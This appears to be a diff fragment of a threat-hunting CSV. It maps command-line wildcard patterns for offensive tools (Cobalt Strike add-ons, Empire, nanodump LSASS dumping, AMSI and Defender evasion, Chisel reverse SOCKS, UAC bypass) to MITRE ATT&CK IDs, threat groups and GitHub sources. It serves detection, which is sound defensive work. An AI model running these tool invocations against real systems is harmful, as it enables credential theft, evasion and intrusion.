+"* scan * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* scan --github-org*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z"
+"* scan --github-user*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z"
+"* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags 
on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
+"* --scan-local-shares * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"* 
ScareCrow.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z"
+"* -ScheduledTask -OnIdle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z"
+"* scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z"
+"* --script dns-srv-enum *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - 
T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --script http-ntlm-info *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --script smb-enum-shares *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --script smb-security-mode*smb-enum-shares *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"* --script smb-vuln-*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"* --script=http-ntlm-info --script-args=http-ntlm-info.root=*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","0","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z"
+"* --script=ldap-search -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --script=realvnc-auth-bypass *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --script=robots -z list*robots.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* --script-args dns-srv-enum.domain=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking 
environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* -ScriptString * -GetMinimallyObfuscated*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
+"* -ScriptString * -PSAmsiScanner *","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
+"* -seatbelt -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* --seclogon-duplicate*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"* SeriousSam.Execute *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
+"* --server * --type pass-pols*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z"
+"* server -p 80 --reverse --socks5*","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start 
a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* server.py -s tornado --cert /*pem --key /*.pem*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
+"* -ServerUri * -FindAmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
+"* service -dump all-services.json*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"* --service fortynorth*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* -ServiceName * -PipeName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* servicetags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --session=allrules --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* --set-as-owned smart -bp * kerberos * --kdc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* Set-MpPreference -DisableIOAVProtection *","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"* SetMzLogonPwd *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"* set-objectowner * -target-sid * -owner-sid *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z"
+"* setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z"
+"* -sgn -syscalls *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"* -sgn -unhook -antidebug *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"* shadow auto -u * -p * -account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
+"* SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"* -SharpChromium *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* -SharpDPAPI -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z"
+"* -SharPersist *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z"
+"* -SharpShares *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* -SharpSniper *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* SharpSocks 
*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"* -SharpSpray *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* -SharpUp -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* -Sharpview *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
